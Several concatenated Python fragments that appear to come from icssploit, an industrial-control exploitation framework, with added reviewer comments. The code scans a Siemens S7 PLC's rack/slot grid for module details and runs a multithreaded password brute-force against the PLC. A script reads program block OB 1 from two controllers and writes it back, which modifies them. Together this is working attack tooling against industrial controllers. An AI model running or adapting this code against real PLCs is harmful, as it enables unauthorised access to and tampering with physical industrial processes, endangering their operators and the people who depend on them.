def get_target_info(self, host, port):
    """Query one host for S7 module details across the configured rack/slot grid.

    Every rack in ``self.min_rack..self.max_rack`` and every slot in
    ``self.min_slot..self.max_slot`` (both inclusive) is tried in turn.
    A reply with a non-empty order code is appended to ``self.result``
    as ``[order_code, module_type_name, firmware_version, module_name,
    serial_number, "rack/slot", host]``.

    Args:
        host: Address passed to ``S7Client`` as ``ip``; also stored in
            the result row.
        port: Port passed to ``S7Client``.

    Returns:
        ``False`` as soon as any rack/slot attempt raises; otherwise the
        loops run to completion and the method returns ``None``.
    """
    for rack in range(self.min_rack, self.max_rack + 1):
        for slot in range(self.min_slot, self.max_slot + 1):
            print_status("Tring to scan %s with Rack%s/Slot%s" % (host, rack, slot))
            try:
                client = S7Client(name='S7Scanner', ip=host, port=port,
                                  rack=rack, slot=slot)
                client.connect()
                # The AS name is part of the reply but is not reported.
                (order_code, firmware_version, module_type_name,
                 _as_name, module_name, serial_number) = client.get_target_info()
                if order_code == '':
                    # An empty order code is treated as "nothing at this rack/slot".
                    continue
                self.result.append([
                    order_code,
                    module_type_name,
                    firmware_version,
                    module_name,
                    serial_number,
                    '%s/%s' % (rack, slot),
                    host,
                ])
            except Exception as err:
                print_error(err)
                # NOTE(review): nesting reconstructed from a flattened listing.
                # As written, the first failing rack/slot ends the whole scan,
                # and the client is never explicitly closed - confirm both.
                return False
def target_function(self, running, data):
    """Thread body that checks candidate passwords against one S7 target.

    A single ``S7Client`` is connected up front and reused for every
    candidate. Each loop iteration calls ``check_privilege()`` and, unless
    the target reports protection level 1, ``auth()`` with the next
    candidate. On the wire this is presumably one authentication attempt
    per candidate from the same connection - confirm in S7Client.

    Args:
        running: Shared flag offering ``is_set()`` and ``clear()``; the
            loop stops once it is cleared.
        data: Candidate source consumed with ``.next()`` (Python 2-style
            iterator); ``StopIteration`` ends the loop.

    Side effects:
        Appends ``(self.target, self.port, string)`` to ``self.strings``
        for every accepted candidate, and clears ``running`` on the first
        hit when ``self.stop_on_success`` is truthy.
    """
    verbose = boolify(self.verbose)
    thread_name = threading.current_thread().name
    print_status(thread_name, 'thread is starting...', verbose=verbose)

    # NOTE(review): no port= is passed here, so self.port only appears in
    # the messages below and may not be the port actually contacted.
    client = S7Client(name="Siemens PLC", ip=self.target,
                      rack=self.rack, slot=self.slot)
    client.connect()
    if not verbose:
        # 50 is the numeric value of logging.CRITICAL (assuming a stdlib logger).
        client.logger.setLevel(50)

    while running.is_set():
        try:
            candidate = data.next().strip()
            if len(candidate) > 8:
                # Candidates longer than 8 characters are never submitted.
                continue

            client.check_privilege()
            if client.protect_level == 1:
                # Level 1 is reported as "no password configured"; the thread
                # exits here without printing the termination message.
                print_error("Target didn't set password.")
                return

            client.auth(candidate)
            if not client.authorized:
                # NOTE(review): "community string" is SNMP wording; this
                # branch reports a rejected S7 password.
                print_error(
                    "Target: {}:{} {}: Invalid community string - String: '{}'"
                    .format(self.target, self.port, thread_name, candidate),
                    verbose=verbose)
                continue

            if boolify(self.stop_on_success):
                running.clear()
            print_success(
                "Target: {}:{} {}: Valid password string found - String: '{}'"
                .format(self.target, self.port, thread_name, candidate),
                verbose=verbose)
            self.strings.append((self.target, self.port, candidate))
        except StopIteration:
            break

    print_status(thread_name, 'thread is terminated.', verbose=verbose)
from icssploit.clients.s7_client import S7Client

if __name__ == '__main__':
    # Manual smoke test against one fixed controller: connect, query the
    # protection level, then print the module identification tuple.
    # The address, rack and slot are hard-coded for a single bench device.
    plc = S7Client(name="s7Test", ip="192.168.218.101", rack=0, slot=3)
    plc.connect()
    # Any return value of check_privilege() is discarded here.
    plc.check_privilege()
    module_info = plc.get_target_info()
    print(module_info)
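import os
import sys

# icssploit is resolved relative to the working directory, so the script
# has to be started from the directory that contains ./scripts/isf.
sys.path.append('./scripts/isf')
from icssploit.clients.s7_client import S7Client

# Round-trip check for two controllers whose addresses come from the
# environment variables s7_400 and s7_1500 (a missing variable raises
# KeyError before anything is contacted). For each controller, OB 1 is
# read, printed, and then written back unchanged.
# Siemens naming: "upload" reads from the PLC, "download" writes to it,
# so download_block_to_target() modifies the controller it is called on.

ip_400 = os.environ["s7_400"]
target = S7Client(name="S7-400", ip=ip_400, rack=0, slot=3)
try:
    print('\033[46;1mS7-400 PLC - ' + ip_400 + ':\033[0m')
    target.connect()
    data = target.upload_block_from_target(block_type='OB', block_num=1)
    print('\033[36;1m' + data + '\033[0m')
    target.download_block_to_target(data)
except Exception as err:
    # Narrowed from a bare except so Ctrl-C and SystemExit still propagate.
    # The failure may come from the upload or download step, not only from
    # connect(), so the underlying error is included in the message.
    print('\033[41;1mSomething went wrong while connecting to ' + ip_400 +
          ': ' + str(err) + '\033[0m')

ip_1500 = os.environ["s7_1500"]
target2 = S7Client(name="S7-1500", ip=ip_1500, rack=0, slot=3)
try:
    print('\033[46;1mS7-1500 PLC - ' + ip_1500 + ':\033[0m')
    target2.connect()
    # Fixed: the original called these two methods on `target` (the S7-400
    # client), so the S7-1500 section never touched the S7-1500 after
    # connect() and instead wrote to the S7-400 a second time under the
    # S7-1500 banner.
    data = target2.upload_block_from_target(block_type='OB', block_num=1)
    print('\033[36;1m' + data + '\033[0m')
    target2.download_block_to_target(data)
except Exception as err:
    print('\033[41;1mSomething went wrong while connecting to ' + ip_1500 +
          ': ' + str(err) + '\033[0m')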